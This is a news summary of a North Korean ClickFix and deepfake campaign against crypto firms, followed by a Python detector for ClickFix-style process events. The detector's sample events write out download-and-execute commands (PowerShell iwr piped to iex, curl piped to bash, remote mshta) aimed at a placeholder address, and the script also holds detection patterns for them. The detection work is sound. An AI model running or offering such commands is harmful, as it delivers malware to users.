Google Warns of AI-Powered North Korean Malware Campaign Targeting Crypto, DeFi

Summary

North Korean hacker group UNC1069, which Google links to the state-backed cluster also tracked as CryptoCore, is targeting the cryptocurrency sector with advanced social engineering, including AI-generated deepfake video played during fake video meetings. According to Google's Mandiant, recent attacks involved a compromised Telegram account, victims lured onto spoofed Zoom calls, and malware delivered through "ClickFix" instructions: under the guise of troubleshooting, the victim is told to copy a command and run it themselves, so the payload is launched by the user's own hands rather than by an exploit. The attackers traded on trust by impersonating known executives and used AI to mimic real people in both live calls and written communication, making fraudulent requests appear routine and credible.

In 2025, North Korean hackers stole $2.02 billion in cryptocurrency, a 51% increase over the previous year, bringing their cumulative total to $6.75 billion, even though the number of incidents fell. The shift is from broad phishing campaigns to highly targeted attacks that exploit routine digital interactions.

Security experts warn that as AI makes impersonation scalable and automated, deepfakes included, it will become increasingly difficult for individuals to distinguish real from fake. They stress the need for systemic protections and stronger authentication methods rather than relying on users to detect deception.
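Whatever the pretext, the ClickFix stage leaves a consistent footprint for defenders: an interactive launcher (the Windows Run dialog, which runs under explorer.exe, or a macOS Terminal) spawning an interpreter whose command line contains a download-and-execute cradle. The following is an added example written for this page, not code from Google, Mandiant, or the reported campaign. It applies generic ClickFix heuristics to constructed process-creation events; the JSON field names (loosely modelled on Sysmon Event ID 1 and EDR telemetry), file paths, 203.0.113.x documentation-range addresses, and sample commands are all assumptions and not indicators from the campaign.

```python
"""Heuristic detection of ClickFix-style command execution.

Added example for this page, not from the Google/Mandiant report. Flags
process-creation events in which an interactive launcher spawns an
interpreter with a download-and-execute cradle on its command line.
Field names are an assumption (Sysmon-like); sample events are constructed.
"""
import json
import re
from typing import Iterable

# Interactive launchers a victim uses after being told "press Win+R" or
# "open Terminal". Compared case-insensitively by basename.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2", "finder"}

# Interpreters that ClickFix lures typically invoke.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "bash", "sh", "zsh",
                "curl", "osascript"}

# (indicator name, case-insensitive regex) for common download-and-run cradles.
CRADLE_PATTERNS = [
    ("powershell_web_cradle",
     re.compile(r"(invoke-webrequest|iwr\b|irm\b|invoke-restmethod|"
                r"downloadstring|net\.webclient)", re.I)),
    ("powershell_encoded", re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
    ("curl_pipe_shell", re.compile(r"curl\b[^|]*\|\s*(sudo\s+)?(ba)?sh\b", re.I)),
    ("base64_decode_exec",
     re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba)?sh\b", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
]


def _basename(path: str) -> str:
    """Lower-cased final path component, tolerant of Windows separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the cradle indicators matched by one event (empty means no alert).

    Both conditions must hold: the parent is an interactive launcher AND the
    child is a known interpreter. A build server running iwr is not ClickFix.
    """
    parent = _basename(event.get("parent_image", ""))
    image = _basename(event.get("image", ""))
    if parent not in INTERACTIVE_PARENTS or image not in INTERPRETERS:
        return []
    cmd = event.get("command_line", "")
    return [name for name, pat in CRADLE_PATTERNS if pat.search(cmd)]


def detect_clickfix(lines: Iterable[str]) -> list:
    """Parse JSON-lines process-creation events and return one alert per hit."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        hits = score_event(event)
        if hits:
            alerts.append({
                "host": event.get("host"),
                "user": event.get("user"),
                "image": _basename(event.get("image", "")),
                "indicators": hits,
                "command_line": event.get("command_line"),
            })
    return alerts


# Constructed sample telemetry (assumed format; not real campaign data).
SAMPLE_EVENTS = [
    # Windows ClickFix: Run dialog -> PowerShell download cradle, hidden window.
    json.dumps({"host": "ws-01", "user": "alice",
                "parent_image": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "command_line": 'powershell -w hidden -c "iwr http://203.0.113.10/fix.ps1 | iex"'}),
    # macOS ClickFix: Terminal -> curl piped into bash.
    json.dumps({"host": "mac-07", "user": "bob",
                "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
                "image": "/bin/bash",
                "command_line": 'bash -c "curl -fsSL http://203.0.113.10/audio-fix.sh | bash"'}),
    # Windows ClickFix: Run dialog -> mshta fetching a remote HTA.
    json.dumps({"host": "ws-02", "user": "carol",
                "parent_image": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\mshta.exe",
                "command_line": "mshta http://203.0.113.10/a.hta"}),
    # Benign: same cradle, but spawned by a CI agent, not an interactive launcher.
    json.dumps({"host": "build-01", "user": "svc-ci",
                "parent_image": r"C:\Program Files\Jenkins\jenkins.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "command_line": "powershell -c \"iwr https://internal.example/tool.zip -OutFile t.zip\""}),
    # Benign: interactive PowerShell with no cradle.
    json.dumps({"host": "ws-01", "user": "alice",
                "parent_image": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "command_line": 'powershell -NoProfile -Command "Get-ChildItem C:\\Users\\alice\\Documents"'}),
]

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert)
```

The parent-process condition is what keeps this from drowning in noise: download cradles are everywhere in legitimate automation, but a human pasting one into the Run dialog or a fresh Terminal window seconds after joining a video call is exactly the behaviour the lure produces. On Windows the same paste also lands in the RunMRU registry key under the user's hive, which is a useful corroborating artifact during incident response. Expect to tune the pattern list and add allowlists for administrators who genuinely work this way.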